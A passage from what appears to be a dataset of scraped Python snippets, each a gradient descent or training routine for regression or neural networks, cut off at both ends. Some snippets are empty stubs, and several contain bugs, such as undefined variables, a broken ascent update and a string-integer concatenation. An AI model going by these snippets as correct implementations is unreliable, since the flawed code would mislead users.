= data[:,1]\n x = ones(shape=(len(population),2)) #add ones for theta0 \n x[:,1] = population\n x = transpose(x)\n error_history = zeros(shape=(num_iters,1))\n \n for i in range(num_iters):\n predictions = theta.dot(x)\n errors_x1 = (predictions - prices) * x[0,:]\n errors_x2 = (predictions - prices) * x[1,:]\n theta[0][0] = theta[0][0] - alpha*(1.0/len(population))*errors_x1.sum()\n theta[0][1] = theta[0][1] - alpha*(1.0/len(population))*errors_x2.sum()\n error_history[i,0] = calculate_cost(theta,data)\n \n return theta, error_history", "def gradient_descent(features, values, theta, alpha, num_iterations):\r\n\r\n m = len(values)\r\n cost_history = []\r\n\r\n for i in range (num_iterations):\r\n \r\n h = numpy.dot(features, theta)\r\n \r\n theta = theta - alpha / m * numpy.dot((h-values),features)\r\n \r\n cost = compute_cost(features, values, theta)\r\n \r\n cost_history.append(cost)\r\n\r\n return theta, pandas.Series(cost_history) # leave this line for the grader\r", "def gradient_descent(features, values, theta, alpha, num_iterations):\n m = len(values)\n cost_history = []\n\n for i in range(num_iterations):\n predicted_values = np.dot(features, theta)\n delta = alpha / m * np.dot((predicted_values - values), features)\n theta = theta - delta\n cost = compute_cost(features, values, theta)\n cost_history.append(cost)\n return theta, pandas.Series(cost_history)", "def gradient_descent(features, values, theta, alpha, num_iterations):\n \n # number of points\n npoints = len(values)\n \n # intialize cost history\n cost_history = []\n \n # num_interations iterations\n for iiter in range(num_iterations):\n \n # compute and store cost\n cost = compute_cost(features, values, theta)\n cost_history.append(cost)\n \n # update values of theta\n values_predicted = np.dot(features, theta)\n theta = theta + (alpha/npoints)*(np.dot(values - values_predicted,features))\n \n return theta, pandas.Series(cost_history)", "def gradient_descent(data_x, data_y, parameters, learn_rate, nb_iterations):\n\n # Cost history\n cost_tracking = np.zeros(nb_iterations)\n\n for _i in range(nb_iterations):\n parameters -= learn_rate * gradient(data_x, data_y, parameters)\n # recording the cost for each iteration\n cost_tracking[_i] = cost_function(data_x, data_y, parameters)\n\n return parameters, cost_tracking", "def _batch_gradient_descent(self, X, y, lr, epochs):\n\n # Initialize the bias and weights.\n _, n = X.shape\n self.bias = 0\n self.weights = np.random.normal(size=n)\n\n for i in range(epochs):\n # Calculate and sum the gradient delta of each sample\n grad_bias, grad_weights = self._get_gradient(X, y)\n\n # Show the gradient of each epoch.\n grad = (grad_bias + grad_weights.mean()) / 2\n print(\"Epochs %d gradient %.3f\" % (i + 1, grad), flush=True)\n\n # Update the bias and weight by gradient of current epoch\n self.bias += lr * grad_bias\n self.weights += lr * grad_weights", "def _gradient_descent(self, X, y, epochs, learning_rate, batch_size):\n num_feats = X.shape[1]\n num_samples = X.shape[0]\n\n y = y.reshape(num_samples, 1)\n W = np.random.rand(num_feats, 1)\n training_loss_epochs = []\n\n for ix in range(epochs):\n shuffled_ix = (np.arange(0, len(X)))\n np.random.shuffle(shuffled_ix)\n X = X[shuffled_ix, :]\n y = y[shuffled_ix, :]\n\n for batch_ix in np.arange(0, X.shape[0], batch_size):\n dW = self._compute_gradient(W, X[batch_ix:batch_ix + batch_size], y[batch_ix:batch_ix + batch_size])\n W -= learning_rate * dW\n\n if ix % 10 == 0:\n y_pred = np.dot(X, W)\n training_loss = self.mse(y, y_pred)\n print('epoch {0} : training loss {1}'.format(ix, training_loss))\n training_loss_epochs.append(training_loss[0])\n\n self.weights = W\n self.training_loss = training_loss_epochs\n return None", "def gradient_descent(X, y, theta, learning_rate, num_iters, lambda_reg):\n thetas = [theta]\n cost = np.zeros(num_iters)\n\n J = mean_cross_entropy_costs(X, y, lambda_reg)\n cost[0] = J(thetas[0])\n for i in range(1, num_iters):\n thetas.append(compute_new_theta(X, y, thetas[i - 1], learning_rate, lambda_reg))\n cost[i] = J(thetas[i])\n return cost, thetas", "def gradient_descent(X, Y, iterations, alpha, l = 0):\n \n # initialize B0, B1, ..., Bp\n betas = np.array([0.0]*(len(X[0])+1))\n \n # initialize list of cost vs iterations; should see a gradual descent\n costs = np.array([0.0]*iterations)\n \n # number of observations\n m = len(X)\n \n for i in range(iterations):\n sumterms = 1.0/m * ([estimation(xvec,betas) for xvec in X] - Y)\n errors = np.array([0.0]*len(betas))\n errors[0] = sum(sumterms) # error term for B0 has no multiplier\n for k in range(1,len(betas)):\n errors[k] = np.dot(sumterms, [row[k-1] for row in X]) + l/m*betas[k]\n \n betas = betas - alpha * errors\n costs[i] = cost(X, Y, betas, l)\n \n return betas, costs", "def gradientDescentMulti(X, y, theta, alpha, num_iters):\n\n # Initialize some useful values\n J_history = []\n theta, J_history = gradientDescent(X, y, theta, alpha, num_iters)\n return theta, J_history", "def batchGD(self, x, y, epochs):\n print(\"Training using batch gradient descent\")\n epoch = 0\n #output training progress ten times in run\n outputChunk = int ( epochs / 10 )\n\n while epoch <= epochs:\n\n #output progress? \n if epoch % outputChunk is 0:\n J = self.costFunction(x,y)\n print(\"Epoch=\", epoch, \"J=\", J)\n\n #get analytic gradients \n partial_J_w_ih, partial_J_w_ho, partial_J_b_h, partial_J_b_o = \\\n self.deriv_costFunction( x, y )\n #take a GD step\n #To-do - implement variable learning rate\n self.w_ih -= partial_J_w_ih\n self.w_ho -= partial_J_w_ho\n self.b_h -= partial_J_b_h\n self.b_o -= partial_J_b_o\n \n epoch += 1", "def gradient_descent(self, X ,eta, tol,iter):\n gd=[]\n gd_x=[X]\n iteration=0\n # current_pt=X\n first_derivative=sym.diff(self.gdfunc)\n #print(first_derivative)\n x=sym.Symbol('x')\n first_derivative=sym.lambdify(x,first_derivative)\n learn_rate=eta\n \n \n prev_x=X\n new_x=prev_x -(learn_rate*first_derivative(prev_x))\n gd_x.append(new_x)\n #print(\"prev_x = \",prev_x,\" Next x = \",new_x)\n for i in range(iter):\n prev_x=new_x\n #print(prev_x)\n new_x=prev_x -(learn_rate*first_derivative(prev_x))\n gd_x.append(new_x)\n # print(\"x = \",new_x,\"Gradient =\",learn_rate*self.func(prev_x))\n if abs(self.func(new_x)) <= self.func(tol) :\n break\n iteration=iteration+1\n #print(\"Best at GD x= \",new_x)\n gd.append(gd_x)\n gd.append(new_x)\n gd.append(iteration)\n\n return gd", "def run_steep_gradient_descent(data_x, data_y, len_data, alpha, theta):\n n = len_data\n # WE NEED TO transpose data_x into (p+1) *n ,theta is 1*(p+1)\n prod = np.dot(theta, data_x.transpose())\n\n prod -= data_y\n print(\"pro: data_x\", prod.shape, data_x.shape)\n #prod represent the loss of the hypothesis and true label\n sum_grad = np.dot(prod, data_x)\n print(\"总梯度的值:\",sum_grad.shape)\n\n # batch-gradient descent\n theta = theta -(alpha / n) * sum_grad\n return theta", "def gradientdescent(cost_func, theta, args=(), delta_func = 0):\n step = 1\n old_cost = 0\n while True:\n theta_old = theta.copy()\n cost = cost_func(theta, *args)\n delta = delta_func(theta, *args)\n theta = theta - step * delta\n if cost > old_cost and old_cost != 0:\n step = step*0.7\n if np.allclose(theta_old, theta):\n break\n old_cost = cost\n return theta", "def gradient_descent(f, df, x, sigma=0.5, epsilon=1e-8):\n pass", "def gradientDescent(X, y, theta, alpha, num_iters):\n\n # Initialize some useful values\n J_history = []\n m = y.size # number of training examples\n\n for i in range(num_iters):\n # ====================== YOUR CODE HERE ======================\n # Instructions: Perform a single gradient step on the parameter vector\n # theta.\n #\n # Hint: While debugging, it can be useful to print out the values\n # of the cost function (computeCost) and gradient here.\n #\n # Calculate the gradient step according to the equation for theta1:\n g_step1 = (alpha / m * np.sum( (np.dot(X,theta) - y) * X[:,1]) )\n # Gradient step for theta knot:\n g_step0 = (alpha / m * np.sum( (np.dot(X,theta) - y) ) )\n \n #update theta\n theta[0] = (theta[0] - g_step0)\n theta[1] = (theta[1] - g_step1)\n \n #print([theta , g_step1, g_step0])\n\n # ============================================================\n\n # Save the cost J in every iteration\n J_history.append(computeCost(X, y, theta))\n\n return theta, J_history", "def gradient_descent(initial_theta, X, y, niter, alpha, Lambda=0.0):\n theta_list = []\n cost_list = []\n\n theta = initial_theta\n for i in range(0, niter):\n theta -= alpha*gradient(theta, X, y, Lambda)\n theta_list.append(theta)\n cost_list.append(cost(theta, X, y, Lambda))\n\n return theta_list, cost_list", "def gradient_descent(X, Y, epsilon=1e-6, l=1, step_size=1e-4, max_steps=1000):\n beta = np.zeros(X.shape[1])\n for s in range(max_steps):\n # TODO: Implement iterations.\n pass\n return beta", "def gradient_ascent(f, df, theta_init, step_size, max_iter):\n\n fs = []\n xs = []\n thetas = theta_init\n for i in range(max_iter): #for each data example\n fs.append(f(thetas))\n\n temp = step_size*df(thetas)\n thetas = step_size*df(thetas) #modify that feature by using the derivative of log likelihood\n xs.append(thetas.flatten())\n if i % 10 == 0:\n print(i, thetas)\n\n return thetas, fs, xs", "def gradient_descent(X, Y, max_iter=1000, eta=0.1, mu=0.01):\n Y_onehot = onehot_encoder.fit_transform(Y.reshape(-1,1))\n W = np.zeros((X.shape[1], Y_onehot.shape[1]))\n step = 0\n step_lst = []\n loss_lst = []\n W_lst = []\n\n while step < max_iter:\n step += 1\n W -= eta * gradient(X, Y_onehot, W, mu)\n step_lst.append(step)\n W_lst.append(W)\n loss_lst.append(loss(X, Y_onehot, W))\n\n df = pd.DataFrame({\n 'step': step_lst,\n 'loss': loss_lst\n })\n return df, W", "def _stochastic_gradient_descent(self, X, y, lr, epochs, sample_rate):\n\n # Initialize the bias and weights.\n m, n = X.shape\n self.bias = 0\n self.weights = np.random.normal(size=n)\n\n n_sample = int(m * sample_rate)\n for i in range(epochs):\n for idx in choice(range(m), n_sample, replace=False):\n # Calculate the gradient delta of each sample\n grad_bias, grad_weights = self._get_gradient(X[idx], y[idx])\n\n # Update the bias and weight by gradient of current sample\n self.bias += lr * grad_bias\n self.weights += lr * grad_weights\n\n # Show the gradient of each epoch.\n grad_bias, grad_weights = self._get_gradient(X, y)\n grad = (grad_bias + grad_weights.mean()) / 2\n print(\"Epochs %d gradient %.3f\" % (i + 1, grad), flush=True)", "def batch_grad_descent(X, y, alpha=0.1, num_iter=1000, check_gradient=False):\n num_instances, num_features = X.shape[0], X.shape[1]\n theta_hist = np.zeros((num_iter+1, num_features)) #Initialize theta_hist\n loss_hist = np.zeros(num_iter+1) #initialize loss_hist\n theta = np.ones(num_features) #initialize theta\n\n count = 0\n while count < num_iter+1:\n if check_gradient:\n assert grad_checker(X,y,theta)\n\n grad = compute_square_loss_gradient(X,y,theta)\n theta -= alpha*grad\n theta_hist[count] = theta\n loss_hist[count] = compute_square_loss(X,y,theta)\n count += 1\n \n return theta_hist, loss_hist", "def gradient_descent_for_n_layers(num_layers, W, B, X, Y, alpha, num_iterations):\n Z = [None] * (num_layers + 1)\n A = [None] * (num_layers + 1)\n dA = [None] * (num_layers + 1)\n dW = [None] * (num_layers + 1)\n dB = [None] * (num_layers + 1)\n for _ in range(0, num_iterations):\n\n A[0] = np.array(X, copy=True)\n for j in range(1, num_layers + 1):\n Z[j], A[j] = forward_propagation(A[j - 1], W[j], B[j])\n\n yhat = A[num_layers]\n dA[num_layers] = loss(yhat, Y)\n cost_value = cost(dA[num_layers])\n print(\"cost\", cost_value)\n\n for j in reversed(range(1, num_layers + 1)):\n dA[j-1], dW[j], dB[j] = both_relu_and_linear_transform_and_chain_rule(\n dA[j], Z[j], A[j-1], W[j])\n W[j] = W[j] - (alpha * dW[j])\n B[j] = B[j] - (alpha * dB[j])\n\n return W, B, yhat", "def train(self,features,y):\r\n \r\n if self.learn_type == \"nn\":\r\n #generate supervised dataset\r\n return(self.learner.train_on_batch(features,y))\r\n elif self.learn_type == \"linear\":\r\n grad = 0\r\n n = len(features)\r\n for i in range(n):\r\n #sum over the instances to get an estimate of the gradient\r\n print((y[i] - self.learner.activate(features[i])))\r\n grad -= (y[i] - self.learner.activate(features[i])) * \\\r\n self.learner.grad(features[i])\r\n grad /= n\r\n #update paramter\r\n param = np.copy(self.learner.param)\r\n self.learner.param = param - self.alpha * grad\r\n #print(self.learner.param)\r", "def batchGradientDescent(x,y,theta,alpha):\n m,n = np.shape(x)\n xTran = x.transpose()\n convergence = 0.000000001\n lastCost = 0\n cost = -1 \n recurseCount = 0\n while abs(lastCost - cost) > convergence: # rcurse until converge\n lastCost = cost\n hypothesis = np.dot(x,theta)\n loss = hypothesis - y\n cost = np.sum(loss**2)/(2*m)\n gradient = np.dot(xTran,loss)/m\n theta = theta - alpha*gradient\n recurseCount += 1\n return recurseCount,theta", "def gradient_descent(X, y, theta, alpha, total_iterations, hypothesis):\n len_theta = len(theta)\n m = len(y)\n one_over_m = (1.0 / float(m))\n\n for _ in range(0, total_iterations):\n temp_theta = numpy.zeros(len_theta)\n\n X_by_theta_minus_y = numpy.subtract(hypothesis(numpy.matrix(theta), X), y)\n\n for j in range(0, len_theta):\n jth_column_of_X = X[:,j]\n derivative_j = one_over_m * numpy.multiply(X_by_theta_minus_y, jth_column_of_X).sum()\n temp_theta[j] = theta[j] - alpha*derivative_j\n\n theta = temp_theta\n\n return numpy.matrix(theta)", "def batch_grad_descent(X, y, alpha=0.1, num_step=1000, grad_check=False):\n num_instances, num_features = X.shape[0], X.shape[1]\n theta_hist = np.zeros((num_step+1, num_features)) #Initialize theta_hist\n loss_hist = np.zeros(num_step+1) #Initialize loss_hist\n theta = np.zeros(num_features) #Initialize theta\n #TODO\n loss_hist[0] = compute_square_loss(X, y, theta)\n for i in range(1, num_step+1):\n g = compute_square_loss_gradient(X, y, theta)\n theta = theta - alpha*g\n\n # check\n if grad_check is True:\n assert grad_checker(X, y, theta) \n\n # update\n avg_loss = compute_square_loss(X, y, theta)\n theta_hist[i] = theta\n loss_hist[i] = avg_loss\n\n return [theta_hist, loss_hist]", "def run_gradient_descent_iteration(X, Y, theta, alpha, lambda_factor, temp_parameter):\n delta = sparse.coo_matrix(theta.shape).toarray()\n\n h = compute_probabilities(X, theta, temp_parameter)\n\n for j in range(delta.shape[0]):\n y = Y\n y = np.where(y != j, 0, 1)\n p = y - h[j]\n\n x = X.T * p\n x = x.T\n x = x.sum(axis=0)\n\n grad = -x / (temp_parameter * X.shape[0]) + lambda_factor * theta[j]\n\n delta[j] += grad\n\n theta -= alpha * delta\n\n return theta", "def gradient_descent(x_data, starting_b, starting_w, learning_rate, num_iterations):\n\n b = starting_b\n w = starting_w\n\n for i in range(num_iterations):\n b, w = step_gradient(b, w, x_data, learning_rate)\n b_history.append(b) # stores bias approximations to plot\n w_history.append(w) # stores weight approximations to plot\n err = error(b, w, x_data)\n if err <= .6: # if the error is acceptable exit iterations loop\n print('error = % f' % err)\n break\n return [b, w]", "def gradient_descent(x0,df,rate=0.1,max_iters=1000,min_step=1e-6,max_step=1e5,\n projection=None,trajectory=False,step_history=False,f=None,\n cost_history=False,feedback=False,plot_history=False):\n if feedback is True:\n print(\"gd.gradient_descent():\")\n if f is not None:\n assert callable(f)\n fx0 = f(x0)\n if feedback is True:\n print(f\" initial cost = {fx0:.2e}\")\n if projection is not None:\n assert callable(projection)\n project = True\n else:\n project = False\n if trajectory is True:\n xx = [x0.copy()]\n if step_history is True:\n steps = []\n if cost_history is True:\n assert callable(f)\n fx = [fx0]\n\n x = x0.copy()\n for i in range(max_iters):\n dx = -rate*df(x)\n if project is True:\n x0 = x.copy()\n x = projection(x0+dx)\n dx = x-x0\n else:\n x += dx\n if trajectory is True:\n xx.append(x.copy())\n if cost_history is True:\n fx += [f(x)]\n step_size = np.linalg.norm(dx)\n if step_history is True:\n steps += [step_size]\n if step_size < min_step or step_size > max_step:\n break\n\n results = dict()\n results['output'] = x\n if trajectory is True:\n results['trajectory'] = xx\n if cost_history is True:\n results['cost_history'] = fx\n if step_history is True:\n results['step_history'] = steps\n if plot_history is True:\n assert step_history is True or cost_history is True\n plt.figure()\n if step_history is True:\n plt.semilogy(steps,label='step size')\n if cost_history is True:\n plt.semilogy(fx,label='cost')\n plt.xlabel('iteration number')\n plt.title('Gradient Descent')\n plt.legend()\n results['figure'] = plt\n plt.show(block=False)\n \n if feedback is True:\n if f is not None:\n print(f\" final cost = {f(x):.2e}\")\n \n return results", "def gradient_descent(regression_type, trainingData, theta,\n maxIter, learningRate):\n regression = None\n\n if(regression_type == 1):\n regression = LinearRegression()\n\n all_costs = zeros(maxIter)\n\n for num_iter in range(maxIter):\n\n gradient = regression.calculateGradient(trainingData, theta)\n gradient = gradient*learningRate\n\n theta = theta - gradient\n\n all_costs[num_iter] = regression.calculateCost(trainingData, theta)\n\n return (all_costs, theta)", "def compute_gradient(self, datapoint):\r\n\r\n # YOUR CODE HERE\r\n for feature in range(self.FEATURES):\r\n self.gradient[feature] = self.compute_feat_gradient(datapoint, feature)", "def gradient_descent(y, tx, initial_w, max_iters, gamma, compute_loss, compute_grad, verbose=False):\n \n w = initial_w.copy()\n loss = 0\n\n for n_iter in range(max_iters):\n grad = compute_grad(y, tx, w)\n loss = compute_loss(y, tx, w)\n\n w -= gamma * grad\n\n if verbose:\n print(f\"Gradient Descent ({n_iter}/{max_iters - 1}): loss={loss}, w={w}\")\n \n return w, loss", "def stochastic_gradient_descent(X, Y, epsilon=0.0001, l=1, step_size=0.01,\n max_steps=1000):\n beta = np.ones(X.shape[1])\n for s in range(max_steps):\n # TODO: Implement iterations.\n pass\n return beta", "def SGD_ce(data, labels, eta_0, T):\n data = sklearn.preprocessing.normalize(data)\n w = np.zeros((10,784))\n for t in range(1, T + 1):\n i = np.random.randint(len(data))\n w = w - (eta_0) * grad(w, data[i], labels[i])\n return w", "def gradient_descent(\n self,\n coeffs, \n x_values, y_values):\n old_loss = self.old_loss\n mse = self.loss\n\n for i in range(self.steps):\n new_loss = self.loss_mse(coeffs, x_values, y_values)\n mse = np.append(mse, new_loss)\n if abs(new_loss - old_loss) <= self.early_stop:\n print(f\"Early cut off, difference of losses between steps is less that {self.early_stop}.\")\n break\n old_loss = new_loss\n\n coeffs = coeffs - (self.learning_rate)*self.gradient_calculation(coeffs, x_values, y_values)\n\n mse = np.append(mse, self.loss_mse(coeffs, x_values, y_values))\n self.coefficients = coeffs\n self.loss = mse", "def gradient_descent(self, alpha, batch, weight_gradients, bias_gradients):\n self._dwg = [0] * 8\n self._dbg = [0] * 8\n self._cost = 0\n\n workers = []\n for i in range(batch[0].shape[0]-1):\n p = Process(target=self.mp_gd, args=(batch, weight_gradients, bias_gradients, i))\n workers.append(p)\n p.start()\n\n\n for p in workers:\n self._cost += self._q.get()\n\n self._dwg = list(map(add, self._dwg, self._dwgq.get()))\n self._dbg = list(map(add, self._dbg, self._dbgq.get()))\n\n p.join()\n\n for j in range(len(self._dwg)):\n weight_gradients[j] = weight_gradients[j] - alpha * self._dwg[j]\n bias_gradients[j] = bias_gradients[j] - alpha * self._dbg[j]\n cost = self._cost/len(batch)\n self._cost_history.append(cost)\n\n return weight_gradients, bias_gradients", "def run_linear_regression(data_x, data_y):\n iteration_s = 100\n alpha = 0.0001550\n\n no_features = data_x.shape[1]\n len_data = data_x.shape[0]\n print(\"no_feature :, len_data: \", no_features , len_data)\n #intinilize the the\n theta = np.zeros(no_features)\n #iterations how many time do\n for i in range(0,iteration_s):\n theta = run_steep_gradient_descent(data_x, data_y, len_data, alpha, theta)\n error = sum_of_square_error(data_x, data_y, len_data, theta)\n print(\"at iteration %d - Error is %.5f \" % (i+1, error))\n print(\"theta shape\", theta.shape)\n return theta", "def GradientDescent(X, Y, alpha, iterations):\n\n\tn = X.shape[0]\n\tbeta = np.zeros((X.shape[1],1))\n\n\tfor i in range(1,iterations):\n\t\tbeta = beta - alpha*np.dot(np.transpose(X), np.dot(X, beta) - Y)/float(n)\n\t\t# risk = ((np.dot(X, beta) - Y)**2)/(2*float(n))\n\n\treturn beta", "def gradientDescent(f, df, x, niter=10):\n\n points = []\n\n for i in xrange(niter):\n point = -dfx\n slope = np.dot(point,-point)\n \n #calculate a\n a = backtracking(f,slope,x,point)\n \n\n #update the search point\n x_k = x + a*p\n points.append(x_k)\n x = x_k\n\n return points", "def gradient_descent(self, x, y):\n # Initialize weights vector\n self.weights = np.zeros(len(x[0]))\n\n # Storing number of training example in a variable \n n = len(x)\n\n # Initiate variables to keep track of the current and smallest loss recorded\n lowest_loss = sys.float_info.max\n current_loss = sys.float_info.max\n\n # Initiate variables to keep track of step sizes\n norm = sys.float_info.max\n smallest_norm = sys.float_info.max\n\n # Initiate list variable that stores all previous weights\n prev_weights = []\n\n # Initiate list that stores all the errors. \n errors = []\n \n # Variable to keep track of the number of iterations that returns a bigger loss than current loss\n k_loss_iteration = 1\n\n # Learning loop\n for i in range(self.max_iter):\n\n # Append current weights\n prev_weights.append(np.array(self.weights))\n \n # Minimizing Loss Function Error by adjusting weights using Gradient Descent\n self.weights += self.learning_rate * (sum([x[i] * (y[i] - self.logistic_function(self.weights.dot(x[i]))) for i in range(n)]) - 2 * self.l2 * self.weights)\n\n # Compute the error of the Cost Function and store it in a list\n current_loss = self.cost(x,y)\n\n if len(errors) > 1 and current_loss > errors[-1]:\n k_loss_iteration += 1\n else: \n k_loss_iteration = 1\n\n errors.append(current_loss)\n \n # Track smallest loss\n if current_loss < lowest_loss:\n lowest_loss = current_loss\n\n # Compute the L2 Norm of the difference between current weights and previous weights\n norm = np.linalg.norm(self.weights - prev_weights[-1])\n\n # Track smallest step size and set it as error threshold\n if norm < smallest_norm:\n smallest_norm = norm\n\n # If this L2 norm is smaller than the error_threshold it means that it converged, hence we can break. In other words, repeat until the step size is too small\n if self.error_threshold != None and norm < self.error_threshold:\n print(\"Converged after {} iterations!\".format(i))\n break\n\n # stop if error hasn't gone down in k iterations\n if k_loss_iteration >= 10:\n print(k_loss_iteration + \" iterations of loss not decreasing on {}th itertion.\".format(i))\n break\n\n # Log final weights\n print(\"Final norm: \" + str(norm) + \"\\nSmallest step size recorded: \" + str(smallest_norm) + \"\\nFinal error: \" + str(current_loss) + \"\\nLowest error recorded: \" + str(lowest_loss) + \"\\nNumber of epochs: \" + str(len(errors)) + \"\\nFinal weights: \" + str(self.weights))", "def test_multiple_gradient_descent_with_backprop():\n layer_list = [7, 7, 7, 2]\n print(\"test\", \"layer_list\", layer_list)\n\n X, W, B = initialize_parameters_for_layers(layer_list, 5)\n\n alpha = 0.01\n num_iterations = 2000\n num_layers = len(layer_list) - 1\n\n Y = np.arange(10).reshape(2, 5)\n W, B, yhat = gradient_descent_for_n_layers(num_layers, W, B, X, Y, alpha, num_iterations)\n\n print(\"test done.\") # final W and B are\", W, \"and\", B)\n print(\"final yhat\", yhat)", "def gradientDescent(self,X, y, theta): \n # number of instances\n m = len(y)\n J_history = np.zeros((self.NUM_ITERS,1))\n for i in range(self.NUM_ITERS):\n h = self.sigmoid(X@theta)\n grad = 1 / m * X.T @ (h - y)\n theta = theta - self.ALPHA * grad \n J_history[i] = self.costFunction(theta, X, y)\n \n \n return theta, J_history", "def gradient_descent(x, y, theta=[[0], [0]]):\n m = y.size\n j_history = []\n for i in range(ITERATIONS):\n h = x.dot(theta)\n theta = theta - (ALPHA / m) * (x.T.dot(h - y))\n j_history.append(compute_cost(x, y, theta))\n return theta, j_history", "def train(self, features, labels, optimizer, loss_scale=None):\n loss, gradients = self.compute_gradients(\n features,\n labels,\n optimizer,\n loss_scale=loss_scale,\n )\n optimizer.apply_gradients(list(zip(gradients, self.trainable_weights)))\n return loss", "def GD_method(self, X, Y):\n X = self.normalize(X)\n for epoch in range(self.epochs):\n y_pred = self.logistic_function(X, self.b0, self.b1)\n D_b0, D_b1 = self.cost_derivative(y_pred, Y, X)\n # Update Weights\n self.b0 = self.b0 - self.learning_rate * D_b0\n self.b1 = self.b1 - self.learning_rate * D_b1\n y_pred = self.predict(X)\n self.evaluate(y_pred, Y)", "def learn(self, Xtrain, ytrain):\n self.cost_data = []\n self.weights = np.zeros((len(self.params['features']), 1))\n numsamples = Xtrain.shape[0]\n Xless = Xtrain[:,self.params['features']]\n y = ytrain[:, np.newaxis]\n epochs = 1000\n\n for epoch in range(epochs):\n #Shuffle the data, making sure to maintain the proper correspondence between the features and targets\n data_set = np.append(Xless, y, axis=1)\n np.random.shuffle(data_set)\n Xless = data_set[:, 0:data_set.shape[1] - 1]\n y = data_set[:, -1, np.newaxis]\n for t in range(numsamples):\n gradient = np.dot(np.transpose(Xless[t, :][np.newaxis, :]), np.subtract(np.dot(Xless[t, :], self.weights), y[t, np.newaxis]))\n step_size = 0.01 / (epoch + 1)\n self.weights = self.weights - (step_size * gradient)\n cur_cost = self.cost(self.weights, Xless[t, :], y[t])\n #Format the array properly for the error function\n self.weights = np.ndarray.flatten(self.weights)", "def gradientFunctionReg(theta, X, y, Lambda):\n m = len(y) # number of training examples\n grad = np.zeros(theta.shape[0])\n theta = np.transpose(theta)\n sum_1 = 0\n X = X.values\n y = y.values\n #calcuate the theta_0 \n# ====================== YOUR CODE HERE ======================\n# Instructions: Compute the gradient of a particular choice of theta.\n# Compute the partial derivatives and set grad to the partial\n# derivatives of the cost w.r.t. each parameter in theta\n for i in range(theta.shape[0]):\n if i == 0:\n for j in range(m):\n sum_1 += (sigmoid(np.dot(X[j],theta)) - y[j]) * X[j,i]\n else:\n for j in range(m):\n sum_1 += (sigmoid(np.dot(X[j],theta)) - y[j]) * X[j,i] + Lambda*theta[i]\n grad[i] = sum_1/m\n sum_1 = 0\n\n# =============================================================\n\n return grad", "def stochastic_grad_descent(X, y, alpha=0.01, lambda_reg=10**-2, num_epoch=1000):\n num_instances, num_features = X.shape[0], X.shape[1]\n theta = np.ones(num_features) #Initialize theta\n\n theta_hist = np.zeros((num_epoch, num_instances, num_features)) #Initialize theta_hist\n loss_hist = np.zeros((num_epoch, num_instances)) #Initialize loss_hist\n #TODO\n for i in range(num_epoch):\n shuffled_index = np.arange(X.shape[0])\n np.random.shuffle(shuffled_index)\n for step, j in enumerate(shuffled_index):\n g = compute_regularized_square_loss_gradient(X[j], y[j], theta, lambda_reg)\n theta = theta - (alpha/np.sqrt(step+1))*g\n\n # update\n avg_loss = compute_square_loss(X, y, theta)\n theta_hist[i][j] = theta\n loss_hist[i][j] = avg_loss\n\n return [theta_hist, loss_hist]", "def logistic_regression_gradient_descent(y, tx, initial_w, max_iters, gamma):\n\tw = initial_w\n\n\tfor iter in range(max_iters):\n\t\tw = learning_by_gradient_descent(y, tx, w, gamma)\n\n\treturn w", "def stochastic_gradient_descent(X, y, max_niter=100):\n m, n = X.shape\n w = np.zeros((n, 1))\n\n for i in range(max_niter):\n data_indices = list(range(m))\n for j in range(m):\n alpha = 4.0 / (i + j + 1.0) + 0.01\n rand_idx = int(np.random.uniform(0, len(data_indices)))\n h = sigmoid(np.dot(X[rand_idx, :], w))\n error = h - float(y[rand_idx])\n w = w - alpha * np.outer(X[rand_idx, :], error)\n print('{0} iterations with error {1} weight {2} alpha={3}'.format(i, error, w, alpha))\n del(data_indices[rand_idx])\n classify.w = w\n return w", "def gradient_descent(g_dd, y_train, loss, g_td=None):\n\n output_dimension = y_train.shape[-1]\n\n g_dd = empirical.flatten_features(g_dd)\n\n def fl(fx):\n \"\"\"Flatten outputs.\"\"\"\n return np.reshape(fx, (-1,))\n\n def ufl(fx):\n \"\"\"Unflatten outputs.\"\"\"\n return np.reshape(fx, (-1, output_dimension))\n\n # These functions are used inside the integrator only if the kernel is\n # diagonal over the logits.\n ifl = lambda x: x\n iufl = lambda x: x\n\n # Check to see whether the kernel has a logit dimension.\n if y_train.size > g_dd.shape[-1]:\n out_dim, ragged = divmod(y_train.size, g_dd.shape[-1])\n if ragged or out_dim != y_train.shape[-1]:\n raise ValueError()\n ifl = fl\n iufl = ufl\n\n y_train = np.reshape(y_train, (-1))\n grad_loss = grad(functools.partial(loss, y_hat=y_train))\n\n if g_td is None:\n dfx_dt = lambda unused_t, fx: -ifl(np.dot(g_dd, iufl(grad_loss(fx))))\n\n def predict(dt, fx=0.):\n r = ode(dfx_dt).set_integrator('dopri5')\n r.set_initial_value(fl(fx), 0)\n r.integrate(dt)\n\n return ufl(r.y)\n else:\n g_td = empirical.flatten_features(g_td)\n\n def dfx_dt(unused_t, fx, train_size):\n fx_train = fx[:train_size]\n dfx_train = -ifl(np.dot(g_dd, iufl(grad_loss(fx_train))))\n dfx_test = -ifl(np.dot(g_td, iufl(grad_loss(fx_train))))\n return np.concatenate((dfx_train, dfx_test), axis=0)\n\n def predict(dt, fx_train=0., fx_test=0.):\n r = ode(dfx_dt).set_integrator('dopri5')\n\n fx = fl(np.concatenate((fx_train, fx_test), axis=0))\n train_size, output_dim = fx_train.shape\n r.set_initial_value(fx, 0).set_f_params(train_size * output_dim)\n r.integrate(dt)\n fx = ufl(r.y)\n\n return fx[:train_size], fx[train_size:]\n\n return predict", "def train_LR(self, X, y, eta=1e-3, batch_size=1, num_iters=1000) :\n loss_history = []\n N,d = X.shape\n for t in np.arange(num_iters):\n X_batch = None\n y_batch = None\n # ================================================================ #\n # YOUR CODE HERE:\n # Sample batch_size elements from the training data for use in gradient descent. \n # After sampling, X_batch should have shape: (batch_size,1), y_batch should have shape: (batch_size,)\n # The indices should be randomly generated to reduce correlations in the dataset. \n # Use np.random.choice. It is better to user WITHOUT replacement.\n # ================================================================ #\n \n # sample indices without replacement\n batch_idx = np.random.choice(N, batch_size, replace = False)\n X_batch = X[batch_idx]\n y_batch = y[batch_idx]\n \n \n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n loss = 0.0\n grad = np.zeros_like(self.w)\n # ================================================================ #\n # YOUR CODE HERE: \n # evaluate loss and gradient for batch data\n # save loss as loss and gradient as grad\n # update the weights self.w\n # ================================================================ #\n \n # compute the loss and gradient\n # loss_and_grad will take responsible for these\n \n loss, grad = self.loss_and_grad(X_batch, y_batch)\n \n self.w = self.w - eta * grad\n \n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n loss_history.append(loss)\n return loss_history, self.w", "def gradient(self, inputs):\n 